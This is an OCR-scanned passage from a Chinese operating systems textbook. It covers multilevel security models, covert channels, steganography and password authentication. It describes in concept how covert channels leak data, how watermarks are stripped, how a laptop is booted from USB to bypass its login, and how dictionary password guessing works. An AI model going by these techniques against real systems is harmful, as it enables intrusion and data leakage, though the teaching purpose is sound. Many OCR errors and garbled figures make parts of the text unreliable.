(1976) 曾经 证 明 在 一 个 不 定 的 保护 系统 的 不 定 配置 中 ， 其 安全 性 从 理 
论 上 来 说 是 不 确定 的 。 但 是 对 特定 系统 来 说 ， 有 可 能 证 明 系 统 可 以 从 授 
权 状 态 转 移 到 未 授权 状态 。 要 获得 更 多 的 信息 请 看 Landwehr (1981) 。 








9.3.7 多 级 安全 


大 多 数 操作 系统 允许 个 人 用 户 来 决定 谁 可 以 读 写 他 们 的 文件 和 其 他 
对 象 。 这 一 策略 称 为 可 目 由 文 配 的 访问 控制 (discretionary access 
control) 。 在 许多 环境 下 ， 这 种 模式 工作 很 稳定 ， 但 也 有 些 环境 需要 更 
高 级 的 安全 ， 如 军 方 、 企 业 专 利 部 门 和 医院 。 在 这 类 环境 里 ， 机 构 定 义 
了 有 关 谁 可 以 看 什么 的 规则 ， 这 些 规则 是 不 能 被 士兵 、 律 师 或 医生 改变 
的 ， 至 少 没 有 老板 的 许可 是 不 允许 的 。 这 类 环境 需要 强制 性 的 访问 控制 
(mandatory access control) 来 确保 所 阐明 的 安全 集 略 被 系统 强制 执行 ， 
而 不 是 可 自由 支配 的 访问 控制 。 这 些 强 制 性 的 访问 控制 管理 整个 信息 
流 ， 确 保 不 会 泄漏 那些 不 应 该 泄漏 的 信息 。 





1.Bell-La Padula 模 型 


最 广泛 使 用 的 多 级 安全 模型 是 Bell-La Padula 模 型 ， 我 们 将 看 看 它 是 
如 何 工 作 的 (Bell La 和 Padula,1973) 。 这 一 模型 最 初 为 管理 军 方 安全 系 
统 而 设计 ， 现 在 被 广泛 运用 于 其 他 机 构 。 在 军 方 领域 ， 文 档 〈 对 象 ) 有 
一 定 的 安全 等 级 ， 如 内 部 级 、 秘 密级 、 机 密级 和 绝密 级 。 每 个 人 根据 他 
可 阅读 文档 的 不 同 也 被 指定 为 不 同 的 密级 。 如 将 军 可 能 有 权 阅 取 所 有 的 
文档 ， 而 中 尉 可 能 只 被 限制 在 秘密 级 或 更 低 的 文档 。 代 表 用 户 运 行 的 进 
程 具有 该 用 户 的 安全 密级 。 由 于 该 系统 拥有 多 个 安全 等 级 ， 所 以 被 称 大 




















多 级 安全 系统 。 
Bell-La Padula 模 型 对 信息 流 做 出 了 一 些 规定 : 


1) 简 易 安 全 规则 : 在 密级 k 上 面 运行 的 进程 只 能 读 同 一 密级 或 更 低 
密级 的 对 象 。 例 如 ， 将 军 可 以 阅 取 中 尉 的 文档 ， 但 中 尉 却 不 可 以 阅 取 将 
军 的 文档 。 








2)* 规 则 : 在 密级 k 上 面 运行 的 进程 只 能 写 同 一 密级 或 更 高 密级 的 对 
象 。 例 如 ， 中 尉 只 能 在 将 军 的 信箱 添加 信息 告知 目 己 所 知 的 全 部 ， 但 是 
将 车 不 能 在 中 尉 的 信箱 里 添加 信息 告知 目 己 所 知 的 全 部 ， 因 为 将 军 拥有 
绝密 的 文档 ， 这 些 文档 不 能 泄露 给 中 尉 。 











简 而 言 之 ， 进 程 既 可 下 读 也 可 上 写 ， 但 不 能 颠倒 。 如 果 系 统 严格 地 
执行 上 述 两 条 规则 ， 那 么 就 不 会 有 信息 从 高 一 级 的 安全 层 泄露 到 低 一 级 
的 安全 层 。 之 所 以 用 * 代 表 这 种 规则 是 因为 在 最 初 的 论文 里 ， 作 者 没有 
想 出 更 好 的 名 字 所 以 只 能 用 * 作 为 临时 的 蔡 代 。 但 是 最 终 作 者 没有 想 出 
更 好 的 名 字 ， 所 以 在 打印 论文 时 用 了 *。 在 这 一 模型 中 ， 进 程 可 以 读 写 
对 象 ， 但 不 能 直接 相互 通信 。Bell-La Padula 模 型 的 图 解 如 图 9-13 所 示 。 
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图 9-13 Bell-La Padula 多 层 安全 模型 


在 图 中 ， 从 对 象 到 进程 的 〈 实 线 ) 箭头 代 该 进程 正在 读 取 对 象 ， 也 
就 是 说 ， 信 息 从 对 象 流 问 进 程 。 同 样 ， 从 进程 到 对 象 的 “虚线 ) 箭头 代 
表 进 程 正在 写 对 象 ， 也 就 是 说 ,信息 从 进程 流向 对 象 。 这 样 所 有 的 信息 
沈 都 沿 大 第 尖 方 向 流动 。 例 如 ， 进 程 B 可 以 从 对 象 1 读 取信 息 但 却 不 可 以 
从 对 象 3 读 取 。 








简单 安全 模型 显示 ， 所 有 的 实 线 〈 读 ) 箭头 横 癌 运动 或 网 上 ; * 规 
则 显示 所 有 的 虚线 第 头 〈 写 ) 也 横向 运行 或 铝 上 上。 既然 信息 流 要 么 水 
平 ， 要 么 垂直 ， 那 么 任何 从 k 层 开始 的 信息 都 不 可 能 出 现在 更 低 的 级 
别 。 也 就 是 说 ， 没 有 路 径 可 以 让 信息 往 下 运行 ， 这 样 就 保证 了 模型 的 安 
全 性 。 





Bell-La Padula 模 型 涉及 组 织 结构 ， 但 最 终 还 是 需要 操作 系统 来 强制 
执行 。 实 现 上 述 模型 的 一 种 方式 是 为 每 个 用 户 分 配 一 个 安全 级 别 ， 该 安 
全 级 别 与 用 户 的 认证 信息 〈 如 UID 和 GID) 一 起 存储 。 在 用 户 登 陆 的 时 
候 ，shell 获 取 用 户 的 安全 级 别 ， 且 该 安全 级 别 会 被 shell 创 建 的 所 有 子 进 
程 继承 下 去 。 如 果 一 个 运行 在 安全 级 别 k 之 下 的 进程 试图 访问 一 个 安全 
级 别 比 k 高 的 文件 或 对 象 ， 操 作 系统 将 会 拒绝 这 个 请 求 。 相 似 地 ， 任 何 
试图 对 安全 级 别 低 于 k 的 对 象 执行 写 操作 的 请 求 也 一 定 会 失败 。 








2.Biba 模 型 


为 了 总 结 用 军 方术 语 表示 的 Bell-La Padula 模 型 ， 一 个 中 尉 可 以 让 一 
个 士兵 把 自己 所 知道 的 所 有 信息 复制 到 将 军 的 文件 里 而 不 妨碍 安全 。 现 
在 让 我 们 把 同样 的 模型 放 在 民用 领域 。 设 想 一 家 公司 的 看 门人 拥有 等 级 
为 1 的 安全 性 ， 程 序 员 拥 有 等 级 为 3 的 安全 性 ， 总 裁 拥 有 等 级 为 5 的 安全 
性 。 使 用 Bell-La Padula 模 型 ， 程 序 员 可 以 向 看 门人 询问 公司 的 发 展 规 
划 ， 然 后 覆 写 总 裁 的 有 关 企 业 策略 的 文件 。 但 并 不 是 所 有 的 公司 都 热衷 
于 这 样 的 模型 。 








Bell-La Padula 模 型 的 问题 在 于 它 可 以 用 来 保守 机 密 ， 但 不 能 保证 数 
据 的 完整 性 。 要 保证 数据 的 完整 性 ， 我 们 需要 更 精确 的 逆向 特性 
(Biba, 1977) 。 


1) 简 单 完整 性 原理 ， 在 安全 等 级 k 上 运行 的 进程 只 能 写 同一 等 级 或 


更 低 等 级 的 对 象 〈 没 有 往 上 写 ) 。 


2) 完 整 性 * 规 则 : 在 安全 等 级 k 上 运行 的 进程 只 能 读 同一 等 级 或 更 高 


等 级 的 对 象 ( 不 能 向 下 读 ) 。 





这 些 特性 联合 在 一 起 确保 了 程序 员 可 以 根据 公司 总 裁 的 要 求 更 新 看 
门人 的 信息 ， 但 反 过 来 不 可 以 。 当 然 ， 有 些 机 构想 同时 拥有 Bell-La 
Padula 和 Biba 特 性 ， 但 它们 之 间 是 矛盾 的 ， 所 以 很 难 同 时 满足 。 


9.3.8 ”隐蔽 信道 


所 有 的 关于 形式 模型 和 可 证 明 的 安全 系统 听 上 去 都 十 分 有 效 ， 但 是 
它们 能 否 真正 工作 ? 简单 说 来 是 不 可 能 的 。 甚 至 在 提供 了 合适 安全 模型 
并 可 以 证 明 实 现 方法 完全 正确 的 系统 里 ， 仍 然 有 可 能 发 生 安 全 泄露 。 本 
节 将 讨论 已 经 严格 证 明 在 数学 上 泄露 是 不 可 能 的 系统 中 ， 信 息 是 如 何 泄 
露 的 。 这 些 观 点 要 归功 于 Lampson (1973) 。 


Lampson 的 模型 最 初 是 通过 单一 分 时 系统 阐述 的 ， 但 在 LAN 和 其 他 
一 些 多 用 户 系统 中 也 采用 了 该 模型 。 该 模型 最 简单 的 方式 是 包含 了 三 个 
运行 在 保护 机 器 上 的 进程 。 第 一 个 进程 是 客户 机 进程 ， 它 让 茶 些 工作 通 
过 第 二 个 进程 也 就 是 服务 器 进程 来 完成 。 客 户 机 进程 和 服务 器 进程 不 完 
全 相互 信任 。 例 如 ， 服 务 器 的 工作 是 帮助 客户 机 来 填写 税 单 。 客 户 机 会 
担心 服务 器 秘密 地 记录 下 它们 的 财务 数据 ， 例 如 ， 列 出 谁 赚 了 多 少 钱 的 
秘密 清单 ， 然 后 转手 倒 夹 。 服 务 器 会 担心 客户 机 试图 禄 取 有 价值 的 税务 
软件 。 





第 三 个 进程 是 协作 程序 ， 该 协作 程序 正在 同 服务 器 合作 来 贸 取 客户 
机 的 机 蜜 数据。 协作 程序 和 服务 器 显然 是 由 同一 个 人 掌握 的 。 这 三 个 进 
程 如 图 9-14 所 示 。 这 一 例子 的 目标 是 设计 出 一 种 系统 ， 在 该 系统 内 服务 
需 进 程 不 能 把 从 客户 机 进程 合法 获得 的 信息 泄露 给 协作 进程 。Lampson 


把 这 一 问题 叫做 界限 问题 Cconfinement problem) 。 


客户 机 “服务 器 协作 程序 进 
和 进程 和 peni 封装 后 的 服务 器 


“隐蔽 信道 





图 9-14 a) 客户 机 进程 、 服 务 器 进程 和 协作 程序 进程 ; b) 封 装 后 的 服 
务 器 可 以 通过 隐藏 信道 向 协作 程序 进程 泄露 信息 








从 系统 设计 人 员 的 观点 来 说 ， 设 计 目 标 是 采取 茶 种 方法 封 朵 或 限制 
服务 器 ， 使 它 不 能 向 协作 程序 传递 信息 。 使 用 保护 矩阵 架构 可 以 较为 容 
易 地 保证 服务 器 不 会 通过 进程 间 通 信 的 机 制 写 一 个 使 得 协作 程序 可 以 进 
行 读 访 问 的 文件 。 我 们 已 可 以 保证 服务 器 不 能 通过 系统 的 进程 间 通 信 机 
制 来 与 协作 程序 通信 。 


遗憾 的 是 ， 系 统 中 仍 存 在 更 为 精巧 的 通信 人 信道。 例如， 服务 器 可 以 
尝试 如 下 的 三 进 制 位 流 来 通信 : 要 发 送 1 时 ， 进 程 在 固定 的 时 间 段 内 奖 
尽 所 能 执行 计算 操作 ， 要 发 送 0 时 ， 进 程 在 同样 长 的 时 间 段 内 睡眠 。 


协作 程序 能 够 通过 仔细 地 监控 啊 应 时 间 来 检测 位 流 。 一 般 而 言 ， 当 


服务 器 送出 0 时 的 啊 应 比 送出 1 时 的 啊 应 要 好 一 些 。 这 种 通信 方式 叫做 隐 
蔽 信道 (covert channel) ， 如 图 9-14b 所 示 。 





当然 ， 隐 蔽 信道 同时 也 是 哮 杂 的 信道 ， 包 含 了 大 量 的 外 来 信息 。 但 
过 纠 错 码 〈 如 汉 明 码 或 者 更 复杂 的 代码 ) 可 以 在 这 样 嘲 杂 的 信道 中 
可 靠 地 传递 信息 。 纠 错 码 的 使 用 使 得 带宽 已 经 很 低 的 隐 贡 信道 变 得 更 
宕 ， 但 仍 有 可 能 泄露 真实 的 信息 。 很 明显 ， 没 有 一 种 基于 对 象 矩 阵 和 域 
的 保护 模式 可 以 防止 这 种 泄露 。 








调节 CPU 的 使 用 率 不 是 惟一 的 隐蔽 信道 ， 还 可 以 调制 页 率 《〈 多 个 页 
面 错误 表示 1， 没 有 页 面 错 误 表 示 0) 。 实 际 上 ， 在 一 个 计时 方式 里 ， 几 
乎 任何 可 以 降低 系统 性 能 的 途径 都 可 能 是 隐蔽 信道 的 候选 。 如 果 系 统 提 
供 了 一 种 锁定 文件 的 方法 ， 那 么 系统 就 可 以 把 锁定 文件 表示 为 1， 解 锁 
文件 表示 为 0。 在 某 些 系统 里 ， 进 程 也 可 能 检测 到 文件 处 于 不 能 访问 的 
锁定 状态 。 这 一 隐蔽 信道 如 图 9-15 所 示 ， 图 中 对 服务 器 和 协作 程序 而 
， 在 某 个 固定 时 间 内 文件 的 锁定 或 未 锁定 都 是 已 知 的 。 在 这 一 实例 
， 在 传送 的 秘密 位 流 是 11010100。 


服务 器 锁定 
服务 器 锁定 ， 
文件 发 送 0 
文件 发 送 ] | | I | (a 4 去 的 位 流 


Her =O) OC) OOO COD 


时 间 一 ~ 








+ k 


图 9-15 使 用 文件 加 锁 的 隐藏 信道 


锁定 或 解锁 一 个 预 置 的 文件 ， 且 S 不 是 在 一 个 特别 嗜 杂 的 信道 里 ， 
并 不 需要 十 分 精确 的 时 序 ， 除 非 比特 率 很 慢 。 使 用 一 个 双方 确认 的 通信 
协议 可 以 增强 系统 的 可 靠 性 和 性 能 。 这 种 协议 使 用 了 2 个 文件 F1 和 F2。 
这 两 个 文件 分 别 被 服务 器 和 协作 程序 锁定 以 保持 两 个 进程 的 同步 。 当 服 
务 吉 锁定 或 解锁 $ 后 ， 它 将 F1 的 状态 反 置 表示 送出 了 一 个 比特 。 一 旦 协 
作 程 序 读 取 了 该 比特 ， 它 将 F2 的 状态 反 置 告知 服务 器 可 以 送出 下 一 个 比 
特 了 ， 直 到 F1 被 再 次 反 置 表示 在 $ 中 第 二 个 比特 已 送 达 。 由 于 这 里 没有 
使 用 时 序 撤 术 ， 所 以 这 种 协议 是 完全 可 靠 的 ， 并 且 可 以 在 繁忙 的 系统 内 
使 它们 得 以 按 计划 快速 地 传递 信息 。 也 许 有 人 会 问 : 要 得 到 更 高 的 带 
宽 ， 为 什么 不 在 每 个 比特 的 传输 中 都 使 用 文件 呢 ? 或 者 建立 一 个 字 节 宽 
的 信道 ， 使 用 从 S0 到 S7 共 8 个 信号 文件 ? 








获取 和 释放 特定 的 资源 (磁带 机 、 绘 图 仪 等 ;也 可 以 用 来 作为 信号 
方式 。 服 务 器 进程 获取 资源 时 表示 发 送 1 信 号 ， 释 放 资 源 时 表示 发 送 0 信 
写 。 在 UNIX 里 ， 服 务 喜 进程 创建 文件 表示 1， 删 除 文件 表示 0; 协作 程 
序 可 以 通过 系统 访问 请 求 来 得 看 文件 是 否 存在 。 即 使 协作 程序 没有 使 用 
文件 的 权限 也 可 以 通过 系统 访问 请 求 来 得 看 。 然 而 很 不 幸 ， 仍 然 还 存在 
许多 其 他 的 隐蔽 信道 。 

















Lampson 也 提 到 了 把 信息 进 露 给 服务 器 进程 所 有 者 〈 人 ) 的 方法 。 
服务 器 进程 可 能 有 资格 告诉 其 所 有 者 ， 它 已 经 营 客 户 机 完成 了 多 少 工 





作 ， 这 样 可 以 要 求 客户 机 付 账 。 如 ， 假 设 真 正 的 计算 值 为 100 美 元 ， 而 
客户 收入 是 53 000 美 元 ， 那 么 服务 器 就 可 以 报告 100.53 美 元 来 通知 自己 
的 主人 。 





仅仅 找到 所 有 的 隐蔽 信道 已 经 是 非常 困难 的 了 ， 更 不 用 说 阻止 它们 
了 。 实 际 上 ， 没 有 什么 可 行 的 方法 。 引 入 一 个 可 随机 产生 页 面 调用 错误 
的 进程 ， 或 为 了 减少 隐蔽 信 着 的 带宽 而 花费 时 间 来 降低 系统 性 能 等 ， 都 
不 是 什么 诱 人 的 好 主意 。 





隐 写 术 





另 一 类 稍微 不 同 的 隐蔽 信道 能 够 在 进程 间 传 递 机 密 信 息 ， 即 使 人 为 
或 自动 的 审查 监视 独 进 程 间 的 所 有 信息 并 茶 止 可 颖 的 数据 传递 。 例 如 ， 
假设 一 家 公司 人 为 地 检查 所 有 发 目 公 司职 员 的 电子 邮件 来 确保 没有 机 窗 
浊 露 给 公司 外 的 竞争 对 手 或 同 误 。 雇 员 是 否 有 办 法 在 审查 者 的 鼻子 下 面 
偷 带 出 机 密 的 信息 呢 ? 结 果 是 可 能 的 。 














让 我 们 用 例子 来 证 明 。 请 看 图 9-16a， 这 是 一 张 在 肯尼亚 拍摄 的 照 
片 ， 照 请 上 有 三 只 斑马 在 注视 痢 金 合欢 树 。 图 9-16b 看 上 去 和 图 9-16a 差 
不 多 ,但 是 却 包 含 了 附加 的 信息 。 这 些 信息 是 完整 而 未 被 删 市 的 五 部 莎 
士 比 亚 戏 剧 : 《哈姆雷特 》、《 李 尔 王 》、《 委 元 白 》、《 威 尼斯 商 
人 》 和 《 表 力 斯 恺 撤 》。 这 些 戏剧 总 共 加 起 来 超过 700KB 的 文本 。 





图 9-16 a) 


只 斑马 和 一 棵 树 ; b) 三 只 斑马 、 一 棵 树 以 及 五 部 莎 士 比 
亚 完 整 的 戏剧 


jn 


隐蔽 信道 是 如 何 工 作 的 呢 ? 原来 的 彩色 图 片 是 1024x768 像 素 的 。 每 
个 像素 包括 三 个 8 位 数字 ， 分 别 代 表 红 、 绿 、 蓝 三 原色 的 亮度 。 像 素 的 
颜色 是 通过 三 原色 的 线性 重 苔 形成 的 。 编 码 程序 使 用 每 个 RGB 色 度 的 低 
位 作为 隐蔽 信道 。 这 样 每 个 像素 就 有 三 位 的 秘密 空间 存放 信息 ， 一 个 在 
红色 色 值 里 ， 一 个 在 绿色 色 值 里 ， 一 个 在 赣 色色 值 里 。 这 种 情况 下 ， 图 
片 大 小 将 增加 1024x768x3 位 或 294 912 个 字 节 的 空间 来 存放 信息 。 








五 部 戏剧 和 一 份 简短 说 明 加 起 来 有 734 891 个 字 节 。 这 些 内 容 首先 
被 标准 的 压缩 算法 压缩 到 274KB， 压 缩 后 的 文件 加 密 后 被 插入 到 每 个 色 
值 的 低位 中 。 正 如 我 们 所 看 到 的 《实际 上 看 不 到 ) ， 存 放 的 信息 完全 是 
不 可 见 的 ， 在 放大 的 、 全 彩 的 照片 里 也 是 不 可 见 的 。 一 旦 图 片 文 件 通 过 
了 审查 ， 接 收 者 就 剥离 低位 数据 ， 利 用 解码 和 解压 缩 算 法 还 原 出 743 





891 个 字 节 。 这 种 隐藏 信息 的 方法 叫做 隐 写 术 〈steganography， 来 自 于 
希腊 语 “ 隐 蔽 书写 ”) 。 隐 写 术 在 那些 试图 限制 公民 通信 自由 的 独裁 统治 
国家 里 不 太 流 行 ， 但 在 那些 非常 有 言论 自由 的 国家 里 却 十 分 流行 。 























在 低 分 辩 紊 下 观看 这 两 张 黑 日 照片 并 不 能 让 人 领略 隐 写 术 的 高 超 技 
巧 。 要 更 好 地 理解 隐 写 术 的 工作 原理 ， 作 者 提供 了 一 个 范例 ， 它 包含 有 
图 9-16b 中 的 图 像 。 这 一 范例 可 以 在 www.cs.vu.nl/~ast/ 上 找到 。 只 要 点 
击 covered writing 下 面 以 STEGANOGRAPHY DEMO 开头 的 链接 即 可 。 
页 面 上 会 指导 用 户 下 载 图 片 和 所 需 的 隐 写 术 工具 来 释放 戏剧 文本 。 





另 一 个 隐 写 术 的 使 用 是 把 隐藏 的 水 印 插入 网 页 上 的 图 片 中 以 防止 穷 
取 者 用 在 其 他 的 网 页 上 。 如 果 你 网 页 上 的 图 片 包含 以 下 秘密 信 
息 : “Copyright 2008,General Images Corporation”， 你 就 很 难说 服 法 官 这 
是 你 自己 制作 的 图 片 。 音 乐 、 电 影 和 其 他 素材 都 可 以 通过 加 入 水 印 来 防 
EDE. 


当然 ， 水 印 的 使 用 也 鼓励 人 们 想 办 法 去 除 它 们 。 通 过 下 面 的 方法 可 
以 攻击 在 像素 低位 内 入 信息 的 技术 : 首先 把 图 像 顺 时 针 转 动 1 度 ， 然 后 
把 它 转 换 为 JPEG 这 样 有 损耗 的 图 片 格式 ， 再 逆 时 针 转 1 度 ， 最 后 图 片 被 
转换 为 原来 的 格式 (如 gif，bmp，tif 等 ) 。 有 损耗 的 JPEG 格 式 会 通过 浮 
点 计算 来 混合 处 理 像素 的 低位 ， 这 样 会 导致 四 舍 五 入 的 发 生 ， 同 时 在 低 
位 增加 了 噪声 信息 。 不 过 ， 放 置 水 印 的 人 们 也 考虑 (或 者 应 该 考虑 ) 到 
了 这 种 情况 ， 所 以 他 们 重复 地 拒 入 水 印 并 使 用 其 他 的 一 些 方法 。 这 反 过 





来 又 促使 了 攻击 者 寻找 更 好 的 手段 去 除 水印 。 结 果 ， 这 样 的 对 抗 周 而 复 


始 。 


9.4 认证 





每 一 个 安全 的 计算 机 系统 一 定 会 要 求 所 有 的 用 户 在 登录 的 时 候 进行 
身份 认证 。 如 果 操 作 系 统 无 法 确定 当前 使 用 该 系统 的 用 户 的 身份 ， 则 系 
统 无 法 决定 哪些 文件 和 资源 是 该 用 户 可 以 访问 的 。 表 面 上 看 认证 似乎 是 
一 个 微不足道 的 话题 ， 但 它 远 比 大 多 数 人 想象 的 要 复杂 。 


用 户 认 证 是 我 们 在 1.5.7 部 分 所 阐述 的 “个 体重 复 系统 发 育 ” 事 件 之 
一 。 早 期 的 主机 ， 如 ENIAC 并 没有 操作 系统 ， 更 不 用 说 去 登录 了 。 后 续 
的 批 处 理 和 分 时 系统 通常 有 为 用 户 和 作业 的 认证 提供 登录 服务 的 机 制 |。 


早期 的 小 型 计算 机 (如 PDP-1 和 PDP-8) 没有 登录 过 程 ， 但 是 随 着 
UNIX 操 作 系 统 在 PDP-11 小 型 计算 机 上 的 广泛 使 用 ， 又 开始 使 用 登录 过 
程 。 早 先 的 个 人 计算 机 (如 Apple I 和 最 初 的 IBM PC) 没有 登录 过 程 ， 
但 是 更 复杂 的 个 人 计算 机 操作 系统 ， 如 Linux 和 Windows Vista 需 要 安全 
登录 〈 然 而 有 些 用 户 却 将 登录 过 程 去 除 ) 。 公 司 局 域 网 内 的 机 器 设置 了 
不 能 被 跳 过 的 登录 过 程 。 今 天 很 多 人 都 直接 登录 到 远程 计算 机 上 ， 享 受 
网 银 服务 、 网 上 购物 、 下 载 音 乐 ， 或 进行 其 他 商业 活动 。 所 有 这 些 都 要 
求 以 登录 作为 认证 身份 的 手段 ， 因 此 认证 再 一 次 成 为 与 安全 相关 的 重要 


话题 。 





决定 如 何 认 证 是 十 分 重要 的 ， 接 下 来 的 一 步 是 找到 一 种 好 方法 来 实 








现 它 。 当 人 们 试图 登录 系统 时 ， 大 多 数 用 户 登 录 的 方法 基于 下 列 三 个 方 
面 考虑 : 


1) 用 户 已 知 的 信息 。 
2) 用 户 已 有 的 信息 。 
3) 用 户 是 谁 。 


有 些 时 候 为 了 达到 更 高 的 安全 性 ， 需 要 同时 满足 上 面 的 两 个 方面 。 
这 些 方面 导致 了 不 同 的 认证 方案 ， 它 们 具有 不 同 的 复杂 性 和 安全 性 。 我 
们 将 依次 论述 
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计算 机 界 , “黑客 ?是 对 资深 程序 员 的 荣誉 称呼 。 他 们 中 也 许 有 一 些 是 其 
诈 性 的 ， 但 大 多 数 人 并 不 是 。 我 们 在 这 方面 理解 错 了 。 考 虑 到 黑客 真正 
的 含义 ， 我 们 应 该 恢复 他 们 的 名 声 ， 并 把 那些 企图 非法 闽 入 计算 机 系统 
的 人 归结 到 骇 客 〈Cracker) 一 类 。 通 第“ 黑客 ”个 分 为 并 不 从 事 违 法 活动 
的 “ 白 帽 子 黑客 * 和 从 事 破坏 活动 的 “ 黑 帽 子 黑客 *。 在 人 们 的 经 验 中 ， 绝 
大 多 数 “ 黑 客 ” 长 时 间 不 在 室内 ， 而 且 并 不 戴 帽子 ， 所 以 事实 上 很 难 通过 
他 们 的 帽子 来 区 分 “黑客 ”的 好 坏 。 








941 使 用 口令 认证 


最 广泛 使 用 的 认证 方式 是 要 求 用 户 输入 登录 名 和 口令 。 口 令 保护 很 
容易 理解 ， 也 很 容易 实施 。 最 简单 的 实现 方法 是 保存 一 张 包含 登录 名 和 
口令 的 列表 。 登 录 时 ， 通 过 查找 登录 名 ， 得 到 相应 的 口令 并 与 输入 的 口 
令 进 行 比 较 。 如 果 匹 配 ， 则 允许 登录 ， 如 果 不 匹 配 ， 登 录 被 拒绝 。 





坚 无 疑问 ， 在 输入 口令 时 ， 计 算 机 不 能 显示 被 输入 的 字符 以 防 在 终 
端 周围 的 好 事 之 徒 看 到 。 在 Windows 系 统 中 ， 将 每 一 个 输入 的 口令 字符 
显示 成 星 写 。 在 UNIX 系 统 中 ， 口 令 被 输入 时 没有 任何 显示 。 这 两 种 认 
证 方法 是 不 同 的 。Windows 也 许 会 让 健忘 的 人 在 输入 口令 时 看 看 输 进 了 
几 个 字符 ， 但 也 把 口令 长 度 泄露 给 了 “ 偷 听 者 ”。 CRA RA, w 
有 一 个 词汇 专门 表示 偷 听 的 意思 ， 而 不 是 表示 偷 颖 ， 这 里 不 是 跑 咕 的 意 
思 ， 这 个 词 在 这 里 不 适用 。) 从 安全 角度 来 说 ， 沉 默 是 金 。 








另 一 个 设计 不 当 的 方面 出 现 了 严重 的 安全 问题 ， 如 9-17 所 示 。 在 图 
9-17a 中 显示 了 一 个 成 功 的 登录 信息 ， 用 户 输入 的 是 小 写字 母 ， 系 统 笨 
出 的 是 大 写字 母 。 在 图 9-17b 中 ， 显 示 了 骇 客 试 图 登录 到 系统 A 中 的 失败 
言 轧 。 在 图 9-17c 中 ， 显 示 了 骇 客 试图 登录 到 系统 B 中 的 失败 信息 。 





LOGIN: carol 


LOGIN: mitch LOGIN: carol PASSWORD: Idunno 
PASSWORD: FooBar!-7 INVALID LOGIN NAME INVALID LOGIN 
SUCCESSFUL LOGIN LOGIN: LOGIN: 


a) b) c) 


图 9-17 一 个 成 功 的 登录 ; bb) 输 入 登录 名 后 被 拒绝 ; 输入 登录 名 和 
口令 后 被 拒绝 


在 图 9-17b 中 ， 系 统 只 要 看 到 非法 的 登录 名 就 禁止 登录 。 这 样 做 是 
一 个 错误 ， 因 为 系统 让 骇 客 有 机 会 尝试 ， 直 到 找到 合法 的 登录 名 。 在 图 
9-17c 中 ， 无 论 骇 和 客 输入 的 是 合法 还 是 非法 的 登录 名 ， 系 统 都 要 求 输 入 
口令 并 没有 给 出 任何 反馈 。 骇 客 所 得 到 的 信息 只 是 登录 名 和 口令 的 组 合 
是 错误 的 。 














大 多 数 笔记 本 电脑 在 用 户 登 录 的 时 候 要 求 一 个 用 户 名 和 密码 来 保护 
数据 ， 以 防止 笔记 本 电脑 失窃 。 然 而 这 种 保护 在 有 些 时 候 却 收效 甚 微 ， 
任何 拿 到 笔记 本 的 人 都 可 以 在 计算 机 启动 后 迅速 敲 击 DEL、F8 或 相关 按 
键 ， 并 在 受 保护 的 操作 系统 启动 前 进入 BIOS 配 置 程序 ， 在 这 里 计算 机 
的 启动 顺序 可 以 被 改变 ， 使 得 通过 USB 端 口 启动 的 检测 先 于 对 从 硬盘 启 
动 的 检测 。 计 算 机 持 有 者 此 时 插入 安装 有 完整 操作 系统 的 USB 设 备 ， 计 
算 机 便 会 从 USB 中 的 操作 系统 启动， 而 不 是 本 机 人 硬盘 上 的 操作 系统 启 
动 。 计 算 机 一 旦 启动 起 来 ， 其 原 有 的 硬盘 则 被 挂 起 (在 UNIX 操 作 系 统 
H) 或 被 映射 为 D 盘 驱动 器 〈 在 Windows 中 ) 。 因 此 ， 绝 大 多 数 BIOS 都 
允许 用 户 设置 密码 以 控制 对 BIOS 配 置 程序 的 修改 ， 在 密码 的 保护 下 ， 





只 有 计算 机 的 真正 拥有 者 才 可 以 修改 计算 机 局 动 顺序 。 如 果 读 者 拥有 一 
台 笔 记 本 电脑 ， 那 么 请 先 放 下 本 书 ， 先 为 BIOS 设 置 一 个 密码 。 


1. 骇 客 如 何 问 入 


大 多 数 骇 客 通 过 远程 连接 到 目标 计算 机 《比如 通过 Internet) 、 尝 试 
多 次 登录 〈 登 录 名 和 口令 ) 的 方法 找到 进入 系统 的 渠道 。 许 多 人 使 用 目 
己 的 名 字 或 名 字 的 某 种 形式 作为 登录 名 。 如 对 Ellen Ann Smith 来 说 ， 
ellen、smith、ellen_smith、ellen-smith、ellen.smith、esmith、easmith 等 
都 可 能 成 为 备 选 登录 名 。 黑 客 凭 借 一 本 叫做 《4096 Names for Your New 
Baby》4096 个 为 娶 儿 准备 的 名 字 的 书 外 加 一 本 含有 大 量 名 字 的 电话 本 ， 
就 可 以 对 打算 攻击 的 国家 计算 机 系统 编辑 出 一 长 串 潜在 的 登录 名 (如 
ellen_smith 可 能 是 在 美国 或 英国 工作 的 人 ， 但 在 日 本 却 行 不 通 ) 。 











当然 ， 仅 仅 猜 出 登录 名 是 不 够 的 。 骇 客 还 需要 猜 出 登录 名 的 口令 。 
这 有 多 难 呢 ? 简单 得 超过 你 的 想象 。 最 经 典 的 例子 是 Morris 和 
Thompson (1979) 在 UNIX 系 统 上 所 做 的 安全 口令 尝试 。 他 们 编辑 了 一 
长 串 可 能 的 口令 : 名 和 姓氏 、 路 名 、 城 市 名 、 字 典 里 中 等 长 度 的 单词 
(也 包括 倒 过 来 拼写 的 ) 、 许 可 证 号 码 和 许多 随机 组 成 的 字符 串 。 然 后 
他 们 把 这 一 名 单 同 系统 中 的 口令 文件 进行 比较 ， 看 看 有 多 少 被 猜 中 的 口 
令 。 结 果 有 86% 的 口令 出 现在 他 们 的 名 单 里 。Klein (1990) 也 得 到 过 同 
样 类 似 的 结果 。 


也 许 有 人 认为 优秀 的 用 户 会 挑选 特别 的 口令 ， 实 际 上 许多 人 并 没有 
这 么 做 。 一 份 1997 年 伦敦 金融 部 门 关 于 口令 的 调查 报告 显示 ，82% 的 口 
令 可 以 被 轻易 猜 出 。 通 常 被 用 户 采 用 的 口令 包括 : EWE 
人 名 家 性 成 员 或 体育 明星 )、 上 度假 地 和 办 公 室 常见 的 物体 (Kabay， 
1997) 。 这 样 ， 骇 客 不 费 吹 灰 之 力 就 可 以 编辑 出 一 系列 潜在 的 登录 名 和 
口令 。 











网 络 的 普及 使 得 这 一 情况 更 加 恶化 。 很 多 用 户 并 不 只 拥有 一 个 密 
码 ， 然 而 由 于 记 住 多 个 元 长 的 密码 是 一 件 困难 的 事情 ， 因 此 大 多 数 用 户 
都 趋同 于 选择 简单 且 强 度 很 弱 的 密码 ， 并 且 在 多 个 网 站 中 重复 使 用 他 们 
(Florencio 和 Herley, 2007; Gaw 和 Felten,2006) 。 








